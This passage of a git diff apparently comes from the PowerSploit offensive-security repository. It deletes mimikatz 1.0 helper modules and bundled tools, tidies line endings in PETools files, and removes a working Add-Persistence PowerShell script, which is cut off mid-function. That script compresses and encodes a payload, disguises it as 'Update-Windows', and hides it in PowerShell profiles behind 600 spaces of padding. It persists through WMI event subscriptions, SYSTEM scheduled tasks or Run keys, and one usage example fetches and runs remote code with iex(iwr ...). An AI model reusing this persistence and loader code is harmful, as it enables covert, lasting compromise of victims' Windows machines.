\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/modules/mod_text.h b/Exfiltration/mimikatz-1.0/modules/mod_text.h deleted file mode 100644 index aeadd95..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_text.h +++ /dev/null @@ -1,31 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <sstream> -#include <iomanip> - -using namespace std; - -class mod_text -{ -public: - static PRTL_INIT_STRING RtlInitString; - static PRTL_INIT_UNICODESTRING RtlInitUnicodeString; - - static wstring stringOfHex(const BYTE monTab[], DWORD maTaille, DWORD longueur = 0); - static wstring stringOrHex(const BYTE monTab[], DWORD maTaille, DWORD longueur = 32, bool ligne = true); - static void wstringHexToByte(wstring &maChaine, BYTE monTab[]); - - static wstring stringOfSTRING(UNICODE_STRING maString); - static string stringOfSTRING(STRING maString); - - static bool wstr_ends_with(const wchar_t * str, const wchar_t * suffix); - static bool wstr_ends_with(const wchar_t * str, size_t str_len, const wchar_t * suffix, size_t suffix_len); - - static void InitLsaStringToBuffer(LSA_UNICODE_STRING * LsaString, wstring &maDonnee, wchar_t monBuffer[]); - static LUID wstringsToLUID(wstring &highPart, wstring &lowPart); -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_thread.cpp b/Exfiltration/mimikatz-1.0/modules/mod_thread.cpp deleted file mode 100644 index d57b4f4..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_thread.cpp +++ /dev/null @@ -1,77 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_thread.h" - -bool mod_thread::getList(vector<THREADENTRY32> * monVecteurThreads, DWORD * processId) -{ - bool reussite = false; - - HANDLE hThreadsSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); - if(hThreadsSnapshot != INVALID_HANDLE_VALUE) - { - THREADENTRY32 monThread; - monThread.dwSize = sizeof(THREADENTRY32); - - if(reussite = (Thread32First(hThreadsSnapshot, &monThread) != 0)) - { - do - { - if(!processId || (*processId == monThread.th32OwnerProcessID)) - monVecteurThreads->push_back(monThread); - } while(Thread32Next(hThreadsSnapshot, &monThread)); - } - CloseHandle(hThreadsSnapshot); - } - - return reussite; -} - -bool mod_thread::suspend(DWORD & threadId) -{ - bool reussite = false; - - HANDLE monHandle = OpenThread(THREAD_SUSPEND_RESUME, false, threadId); - if(reussite = (monHandle && monHandle != INVALID_HANDLE_VALUE)) - { - SuspendThread(monHandle); - CloseHandle(monHandle); - } - - return reussite; -} - -bool mod_thread::resume(DWORD & threadId) -{ - bool reussite = false; - - HANDLE monHandle = OpenThread(THREAD_SUSPEND_RESUME, false, threadId); - if(reussite = (monHandle && monHandle != INVALID_HANDLE_VALUE)) - { - ResumeThread(monHandle); - CloseHandle(monHandle); - } - - return reussite; -} - -bool mod_thread::stop(DWORD & threadId, DWORD exitCode) -{ - bool reussite = false; - - HANDLE monHandle = OpenThread(THREAD_TERMINATE, false, threadId); - if(reussite = (monHandle && monHandle != INVALID_HANDLE_VALUE)) - { - TerminateThread(monHandle, exitCode); - CloseHandle(monHandle); - } - - return reussite; -} - -bool mod_thread::quit(DWORD & threadId) -{ - return PostThreadMessage(threadId, WM_QUIT, NULL, NULL) != 0; -} diff --git a/Exfiltration/mimikatz-1.0/modules/mod_thread.h b/Exfiltration/mimikatz-1.0/modules/mod_thread.h deleted file mode 100644 index a2f62f9..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_thread.h +++ /dev/null @@ -1,19 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <tlhelp32.h> - -class mod_thread -{ -public: - static bool getList(vector<THREADENTRY32> * monVecteurThreads, DWORD * processId = NULL); - - static bool suspend(DWORD & threadId); - static bool resume(DWORD & threadId); - static bool stop(DWORD & threadId, DWORD exitCode = 0); - static bool quit(DWORD & threadId); -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_ts.cpp b/Exfiltration/mimikatz-1.0/modules/mod_ts.cpp deleted file mode 100644 index 97c5fb0..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_ts.cpp +++ /dev/null @@ -1,106 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_ts.h" - -bool mod_ts::openServer(HANDLE * phServer, wstring * server, bool testIt) -{ - bool reussite = false; - - if(reussite = !server) - { - *phServer = WTS_CURRENT_SERVER_HANDLE; - } - else - { - wchar_t * serverName = _wcsdup(server->c_str()); - *phServer = WTSOpenServer(serverName); - delete[] serverName; - reussite = *phServer != NULL; - } - return reussite; -} - -bool mod_ts::closeServer(HANDLE hServer) -{ - if(hServer != WTS_CURRENT_SERVER_HANDLE) - WTSCloseServer(hServer); - - return true; -} - -bool mod_ts::getSessions(vector<KIWI_WTS_SESSION_INFO> * mesSessions, wstring * server) -{ - bool reussite = false; - - PWTS_SESSION_INFO tabSessions; - DWORD nbSessions = 0; - HANDLE hServer = NULL; - - if(openServer(&hServer, server)) - { - if(reussite = WTSEnumerateSessions(hServer, 0, 1, &tabSessions, &nbSessions) != 0) - { - for(DWORD i = 0; i < nbSessions; i++) - { - KIWI_WTS_SESSION_INFO a = {tabSessions[i].SessionId, tabSessions[i].State, tabSessions[i].pWinStationName}; - mesSessions->push_back(a); - } - WTSFreeMemory(tabSessions); - } - closeServer(hServer); - } - - return reussite; -} - -bool mod_ts::getProcesses(vector<KIWI_WTS_PROCESS_INFO> * mesProcesses, wstring * server) -{ - bool reussite = false; - - PWTS_PROCESS_INFO tabProcess; - DWORD nbProcess = 0; - HANDLE hServer = NULL; - - if(openServer(&hServer, server)) - { - if(reussite = WTSEnumerateProcesses(hServer, 0, 1, &tabProcess, &nbProcess) != 0) - { - for(DWORD i = 0; i < nbProcess; i++) - { - KIWI_WTS_PROCESS_INFO a = { - tabProcess[i].SessionId, - tabProcess[i].ProcessId, - tabProcess[i].pProcessName - }; - - wstring user; - wstring domain; - if(mod_secacl::sidToName(tabProcess[i].pUserSid, &user, &domain, server)) - { - a.userSid.assign(domain); - a.userSid.push_back(L'\\'); - a.userSid.append(user); - } - else if(!mod_secacl::sidToStrSid(tabProcess[i].pUserSid, &a.userSid)) - { - if(tabProcess[i].pUserSid) - { - a.userSid.assign(L"erreur SID ; "); - a.userSid.append(mod_system::getWinError()); - } - else - a.userSid.assign(L"n.a."); - } - - mesProcesses->push_back(a); - } - WTSFreeMemory(tabProcess); - } - closeServer(hServer); - } - - return reussite; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/modules/mod_ts.h b/Exfiltration/mimikatz-1.0/modules/mod_ts.h deleted file mode 100644 index 6815bb8..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_ts.h +++ /dev/null @@ -1,35 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_secacl.h" -#include "mod_system.h" -#include <wtsapi32.h> - -class mod_ts -{ -private: - static bool openServer(HANDLE * phServer, wstring * server = NULL, bool testIt = true); - static bool closeServer(HANDLE hServer); - -public: - typedef struct _KIWI_WTS_SESSION_INFO { - DWORD id; - DWORD state; - wstring sessionName; - } KIWI_WTS_SESSION_INFO, * PKIWI_WTS_SESSION_INFO; - - typedef struct _KIWI_WTS_PROCESS_INFO { - DWORD sessionId; - DWORD pid; - wstring processName; - wstring userSid; - } KIWI_WTS_PROCESS_INFO, * PKIWI_WTS_PROCESS_INFO; - - static bool getSessions(vector<KIWI_WTS_SESSION_INFO> * mesSessions, wstring * server = NULL); - static bool getProcesses(vector<KIWI_WTS_PROCESS_INFO> * mesProcesses, wstring * server = NULL); -}; - diff --git a/Exfiltration/mimikatz-1.0/modules/mod_windows.cpp b/Exfiltration/mimikatz-1.0/modules/mod_windows.cpp deleted file mode 100644 index a54c5b7..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_windows.cpp +++ /dev/null @@ -1,26 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_windows.h" - -BOOL WINAPI mod_windows::enumHWNDCallback(HWND hwnd, pair<DWORD, vector<mod_windows::KIWI_HWND_ENTRY> *> * mesHWNDS) -{ - DWORD processId = 0; - if(DWORD threadId = GetWindowThreadProcessId(hwnd, &processId)) - { - if((mesHWNDS->first == 0) || (processId == mesHWNDS->first)) - { - KIWI_HWND_ENTRY monEntree = {hwnd, processId, threadId}; - mesHWNDS->second->push_back(monEntree); - } - } - return TRUE; -} - - -bool mod_windows::getHWNDsFromProcessId(vector<mod_windows::KIWI_HWND_ENTRY> * mesHWNDS, DWORD processId) -{ - return (EnumWindows(reinterpret_cast<WNDENUMPROC>(enumHWNDCallback), reinterpret_cast<LPARAM>(&make_pair<DWORD, vector<mod_windows::KIWI_HWND_ENTRY> *>(processId, mesHWNDS))) != FALSE); -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/modules/mod_windows.h b/Exfiltration/mimikatz-1.0/modules/mod_windows.h deleted file mode 100644 index c5f9887..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_windows.h +++ /dev/null @@ -1,22 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" - -class mod_windows -{ -public: - typedef struct _KIWI_HWND_ENTRY - { - HWND monHandle; - DWORD pid; - DWORD threadId; - } KIWI_HWND_ENTRY, *PKIWI_HWND_ENTRY; - - static bool getHWNDsFromProcessId(vector<mod_windows::KIWI_HWND_ENTRY> * mesHWNDS, DWORD processId = 0); -private: - static BOOL WINAPI enumHWNDCallback(HWND hwnd, pair<DWORD, vector<mod_windows::KIWI_HWND_ENTRY> *> * mesHWNDS); -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_winsta_desktop.cpp b/Exfiltration/mimikatz-1.0/modules/mod_winsta_desktop.cpp deleted file mode 100644 index 57b209e..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_winsta_desktop.cpp +++ /dev/null @@ -1,29 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_winsta_desktop.h" - -BOOL CALLBACK mod_winsta_desktop::EnumWindowStationProc(_In_ LPTSTR lpszWindowStation, _In_ LPARAM lParam) -{ - reinterpret_cast<vector<wstring> *>(lParam)->push_back(reinterpret_cast<const wchar_t *>(lpszWindowStation)); - return TRUE; -} - -BOOL CALLBACK mod_winsta_desktop::EnumDesktopProc(_In_ LPTSTR lpszDesktop, _In_ LPARAM lParam) -{ - reinterpret_cast<vector<wstring> *>(lParam)->push_back(reinterpret_cast<const wchar_t *>(lpszDesktop)); - return TRUE; -} - - -bool mod_winsta_desktop::getWinstas(vector<wstring> * mesWinstas) -{ - return (EnumWindowStations(EnumWindowStationProc, reinterpret_cast<LPARAM>(mesWinstas)) != 0); -} - -bool mod_winsta_desktop::getDesktops(vector<wstring> * mesDesktop) -{ - return (EnumDesktops(NULL, EnumDesktopProc, reinterpret_cast<LPARAM>(mesDesktop)) != 0); -} diff --git a/Exfiltration/mimikatz-1.0/modules/mod_winsta_desktop.h b/Exfiltration/mimikatz-1.0/modules/mod_winsta_desktop.h deleted file mode 100644 index 34b9a94..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_winsta_desktop.h +++ /dev/null @@ -1,18 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" - -class mod_winsta_desktop -{ -private: - static BOOL CALLBACK EnumWindowStationProc(_In_ LPTSTR lpszWindowStation, _In_ LPARAM lParam); - static BOOL CALLBACK EnumDesktopProc(_In_ LPTSTR lpszDesktop, _In_ LPARAM lParam); - -public: - static bool getWinstas(vector<wstring> * mesWinstas); - static bool getDesktops(vector<wstring> * mesDesktop); // ! -}; diff --git a/Exfiltration/mimikatz-1.0/tools/PsExec.exe b/Exfiltration/mimikatz-1.0/tools/PsExec.exe Binary files differdeleted file mode 100644 index ed67480..0000000 --- a/Exfiltration/mimikatz-1.0/tools/PsExec.exe +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/tools/tee.exe b/Exfiltration/mimikatz-1.0/tools/tee.exe Binary files differdeleted file mode 100644 index 7b32b2a..0000000 --- a/Exfiltration/mimikatz-1.0/tools/tee.exe +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/tools/winmine.exe b/Exfiltration/mimikatz-1.0/tools/winmine.exe Binary files differdeleted file mode 100644 index 3833d6c..0000000 --- a/Exfiltration/mimikatz-1.0/tools/winmine.exe +++ /dev/null diff --git a/PETools/Get-LibSymbols.format.ps1xml b/PETools/Get-LibSymbols.format.ps1xml index 41747cb..5d4d848 100644 --- a/PETools/Get-LibSymbols.format.ps1xml +++ b/PETools/Get-LibSymbols.format.ps1xml @@ -1,4 +1,4 @@ -<?xml version="1.0" encoding="utf-8" ?> +<?xml version="1.0" encoding="utf-8" ?> <Configuration> <ViewDefinitions> <View> @@ -28,4 +28,4 @@ </ListControl> </View> </ViewDefinitions> -</Configuration>
\ No newline at end of file +</Configuration> diff --git a/PETools/Get-LibSymbols.ps1 b/PETools/Get-LibSymbols.ps1 index 414454f..9864676 100644 --- a/PETools/Get-LibSymbols.ps1 +++ b/PETools/Get-LibSymbols.ps1 @@ -1,4 +1,4 @@ -function Get-LibSymbols +function Get-LibSymbols { <# .SYNOPSIS @@ -279,4 +279,4 @@ } END {} -}
\ No newline at end of file +} diff --git a/PETools/Get-ObjDump.format.ps1xml b/PETools/Get-ObjDump.format.ps1xml index d44ade0..25e13b8 100644 --- a/PETools/Get-ObjDump.format.ps1xml +++ b/PETools/Get-ObjDump.format.ps1xml @@ -1,4 +1,4 @@ -<?xml version="1.0" encoding="utf-8" ?> +<?xml version="1.0" encoding="utf-8" ?> <Configuration> <ViewDefinitions> <View> @@ -289,4 +289,4 @@ </TableControl> </View> </ViewDefinitions> -</Configuration>
\ No newline at end of file +</Configuration> diff --git a/PETools/Get-ObjDump.ps1 b/PETools/Get-ObjDump.ps1 index 3df8235..2a8ebcb 100644 --- a/PETools/Get-ObjDump.ps1 +++ b/PETools/Get-ObjDump.ps1 @@ -1,4 +1,4 @@ -function Get-ObjDump +function Get-ObjDump { <# .SYNOPSIS @@ -705,4 +705,4 @@ } END {} -}
\ No newline at end of file +} diff --git a/PETools/Get-PEHeader.ps1 b/PETools/Get-PEHeader.ps1 index 2f35292..0021377 100644 --- a/PETools/Get-PEHeader.ps1 +++ b/PETools/Get-PEHeader.ps1 @@ -957,4 +957,4 @@ PROCESS { } -}
\ No newline at end of file +} diff --git a/PETools/PETools.format.ps1xml b/PETools/PETools.format.ps1xml index 17d2c56..c510281 100644 --- a/PETools/PETools.format.ps1xml +++ b/PETools/PETools.format.ps1xml @@ -371,4 +371,4 @@ </TableControl> </View> </ViewDefinitions> -</Configuration>
\ No newline at end of file +</Configuration> diff --git a/PETools/PETools.psd1 b/PETools/PETools.psd1 index 28a60b9..ef470a7 100644 --- a/PETools/PETools.psd1 +++ b/PETools/PETools.psd1 @@ -1,4 +1,4 @@ -@{
+@{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'PETools.psm1'
@@ -86,4 +86,4 @@ FileList = 'PETools.psm1', 'PETools.psd1', 'PETools.format.ps1xml', 'Get-DllLoad # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
-}
\ No newline at end of file +}
diff --git a/PETools/PETools.psm1 b/PETools/PETools.psm1 index e5234fb..81d3818 100644 --- a/PETools/PETools.psm1 +++ b/PETools/PETools.psm1 @@ -1 +1 @@ -Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
\ No newline at end of file +Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} diff --git a/Persistence/Add-Persistence.ps1 b/Persistence/Add-Persistence.ps1 deleted file mode 100644 index cd04fbf..0000000 --- a/Persistence/Add-Persistence.ps1 +++ /dev/null @@ -1,400 +0,0 @@ -function Add-Persistence -{ -<# -.SYNOPSIS - - Add persistence capabilities to a script. - - PowerSploit Function: Add-Persistence - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: New-ElevatedPersistenceOptions, New-UserPersistenceOptions - Optional Dependencies: None - -.DESCRIPTION - - Add-Persistence will add persistence capabilities to any script or scriptblock. This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted. - -.PARAMETER ScriptBlock - - Specifies a scriptblock containing your payload. - -.PARAMETER FilePath - - Specifies the path to your payload. - -.PARAMETER ElevatedPersistenceOptions - - Specifies the trigger for the persistent payload if the target is running elevated. - You must run New-ElevatedPersistenceOptions to generate this argument. - -.PARAMETER UserPersistenceOptions - - Specifies the trigger for the persistent payload if the target is not running elevated. - You must run New-UserPersistenceOptions to generate this argument. - -.PARAMETER PersistenceScriptName - - Specifies the name of the function that will wrap the original payload. The default value is 'Update-Windows'. - -.PARAMETER DoNotPersistImmediately - - Output only the wrapper function for the original payload. By default, Add-Persistence will output a script that will automatically attempt to persist (e.g. it will end with 'Update-Windows -Persist'). If you are in a position where you are running in memory but want to persist at a later time, use this option. - -.PARAMETER PersistentScriptFilePath - - Specifies the path where you would like to output the persistence script. By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory. - -.PARAMETER RemovalScriptFilePath - - Specifies the path where you would like to output a script that will remove the persistent payload. By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory. - -.PARAMETER PassThru - - Outputs the contents of the persistent script to the pipeline. This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline. - -.INPUTS - - None - - Add-Persistence cannot receive any input from the pipeline. - -.OUTPUTS - - System.Management.Automation.ScriptBlock - - If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script. - -.NOTES - - When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine. - -.EXAMPLE - - C:\PS>$ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM' - C:\PS>$UserOptions = New-UserPersistenceOptions -Registry -AtLogon - C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -Verbose - - Description - ----------- - Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. - -.EXAMPLE - - C:\PS>$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) } - C:\PS>$ElevatedOptions = New-ElevatedPersistenceOptions -ScheduledTask -OnIdle - C:\PS>$UserOptions = New-UserPersistenceOptions -ScheduledTask -OnIdle - C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1 - - Description - ----------- - Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement. The final, encoded output is finally saved to .\EncodedPersistentScript.ps1 - -.LINK - - http://www.exploit-monday.com -#> - - [CmdletBinding()] Param ( - [Parameter( Mandatory = $True, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )] - [ValidateNotNullOrEmpty()] - [ScriptBlock] - $ScriptBlock, - - [Parameter( Mandatory = $True, ParameterSetName = 'FilePath' )] - [ValidateNotNullOrEmpty()] - [Alias('Path')] - [String] - $FilePath, - - [Parameter( Mandatory = $True )] - $ElevatedPersistenceOptions, - - [Parameter( Mandatory = $True )] - $UserPersistenceOptions, - - [ValidateNotNullOrEmpty()] - [String] - $PersistenceScriptName = 'Update-Windows', - - [ValidateNotNullOrEmpty()] - [String] - $PersistentScriptFilePath = "$PWD\Persistence.ps1", - - [ValidateNotNullOrEmpty()] - [String] - $RemovalScriptFilePath = "$PWD\RemovePersistence.ps1", - - [Switch] - $DoNotPersistImmediately, - - [Switch] - $PassThru - ) - - Set-StrictMode -Version 2 - -#region Validate arguments - - if ($ElevatedPersistenceOptions.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.ElevatedPersistenceOptions') - { - throw 'You provided invalid elevated persistence options.' - } - - if ($UserPersistenceOptions.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.UserPersistenceOptions') - { - throw 'You provided invalid user-level persistence options.' - } - - $Path = Split-Path $PersistentScriptFilePath -ErrorAction Stop - $Leaf = Split-Path $PersistentScriptFilePath -Leaf -ErrorAction Stop - $PersistentScriptFile = '' - $RemovalScriptFile = '' - - if ($Path -eq '') - { - $PersistentScriptFile = "$($PWD)\$($Leaf)" - } - else - { - $PersistentScriptFile = "$($Path)\$($Leaf)" - } - - $Path = Split-Path $RemovalScriptFilePath -ErrorAction Stop - $Leaf = Split-Path $RemovalScriptFilePath -Leaf -ErrorAction Stop - if ($Path -eq '') - { - $RemovalScriptFile = "$($PWD)\$($Leaf)" - } - else - { - $RemovalScriptFile = "$($Path)\$($Leaf)" - } - - if ($PSBoundParameters['Path']) - { - Get-ChildItem $Path -ErrorAction Stop | Out-Null - $Script = [IO.File]::ReadAllText((Resolve-Path $Path)) - } - else - { - $Script = $ScriptBlock - } - -#endregion - -#region Initialize data - - $CompressedScript = '' - $UserTrigger = '' - $UserTriggerRemoval = '' - $ElevatedTrigger = "''" - $ElevatedTriggerRemoval = '' - $UserTrigger = "''" - $UserTriggerRemoval = '' - $CommandLine = '' - -#endregion - -#region Compress the original payload in preparation for the persistence script - - $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($Script) - $CompressedStream = New-Object IO.MemoryStream - $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) - $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) - $DeflateStream.Dispose() - $CompressedScriptBytes = $CompressedStream.ToArray() - $CompressedStream.Dispose() - $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) - - # Generate the code that will decompress and execute the payload. - # This code is intentionally ugly to save space. - $NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()' - -#endregion - -#region Process persistence options - - # Begin processing elevated persistence options - switch ($ElevatedPersistenceOptions.Method) - { - 'PermanentWMI' - { - $ElevatedTriggerRemoval = { -Get-WmiObject __eventFilter -namespace root\subscription -filter "name='Updater'"| Remove-WmiObject -Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='Updater'" | Remove-WmiObject -Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match 'Updater'} | Remove-WmiObject - } - - switch ($ElevatedPersistenceOptions.Trigger) - { - 'AtStartup' - { - $ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`"" - } - - 'Daily' - { - $ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $($ElevatedPersistenceOptions.Time.ToString('HH')) AND TargetInstance.Minute = $($ElevatedPersistenceOptions.Time.ToString('mm')) GROUP WITHIN 60```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`"" - } - - default - { - throw 'Invalid elevated persistence options provided!' - } - } - } - - 'ScheduledTask' - { - $CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"' - $ElevatedTriggerRemoval = "schtasks /Delete /TN Updater" - - switch ($ElevatedPersistenceOptions.Trigger) - { - 'AtLogon' - { - $ElevatedTrigger = "schtasks /Create /RU system /SC ONLOGON /TN Updater /TR " - } - - 'Daily' - { - $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOptions.Time.ToString('HH:mm:ss')) /TN Updater /TR " - } - - 'OnIdle' - { - $ElevatedTrigger = "schtasks /Create /RU system /SC ONIDLE /I 1 /TN Updater /TR " - } - - default - { - throw 'Invalid elevated persistence options provided!' - } - } - - $ElevatedTrigger = '"' + $ElevatedTrigger + $CommandLine + '"' - } - - 'Registry' - { - $ElevatedTrigger = "New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater -PropertyType String -Value " - $ElevatedTriggerRemoval = "Remove-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater" - $CommandLine = "`"```"`$(`$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe```" -NonInteractive -WindowStyle Hidden`"" - $ElevatedTrigger = "'" + $ElevatedTrigger + $CommandLine + "'" - } - - default - { - throw 'Invalid elevated persistence options provided!' - } - } - - # Begin processing user-level persistence options - switch ($UserPersistenceOptions.Method) - { - 'ScheduledTask' - { - $CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"' - $UserTriggerRemoval = "schtasks /Delete /TN Updater" - - switch ($UserPersistenceOptions.Trigger) - { - 'Daily' - { - $UserTrigger = "schtasks /Create /SC DAILY /ST $($UserPersistenceOptions.Time.ToString('HH:mm:ss')) /TN Updater /TR " - } - - 'OnIdle' - { - $UserTrigger = "schtasks /Create /SC ONIDLE /I 1 /TN Updater /TR " - } - - default - { - throw 'Invalid user-level persistence options provided!' - } - } - - $UserTrigger = '"' + $UserTrigger + $CommandLine + '"' - } - - 'Registry' - { - $UserTrigger = "New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater -PropertyType String -Value " - $UserTriggerRemoval = "Remove-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater" - $CommandLine = "`"```"`$(`$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe```" -NonInteractive -WindowStyle Hidden`"" - $UserTrigger = "'" + $UserTrigger + $CommandLine + "'" - } - - default - { - throw 'Invalid user-level persistence options provided!' - } - } - -#endregion - -#region Original script with its persistence logic will reside here - -# This is intentionally ugly in the interest of saving space on the victim machine. -$PersistantScript = { -function FUNCTIONNAME{ -Param([Switch]$Persist) -$ErrorActionPreference='SilentlyContinue' -$Script={ORIGINALSCRIPT} -if($Persist){ -if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')) -{$Prof=$PROFILE.AllUsersAllHosts;$Payload=ELEVATEDTRIGGER} -else -{$Prof=$PROFILE.CurrentUserAllHosts;$Payload=USERTRIGGER} -' '*600+$Script.ToString()|Out-File $Prof -A -NoC -Fo -iex $Payload|Out-Null -Write-Output $Payload} -else -{$Script.Invoke()} -} EXECUTEFUNCTION - -} - - $PersistantScript = $PersistantScript.ToString().Replace('FUNCTIONNAME', $PersistenceScriptName) - $PersistantScript = $PersistantScript.ToString().Replace('ORIGINALSCRIPT', $NewScript) - $PersistantScript = $PersistantScript.ToString().Replace('ELEVATEDTRIGGER', $ElevatedTrigger) - $PersistantScript = $PersistantScript.ToString().Replace('USERTRIGGER', $UserTrigger) - - if ($DoNotPersistImmediately) - { - $PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', '') - } - else - { - 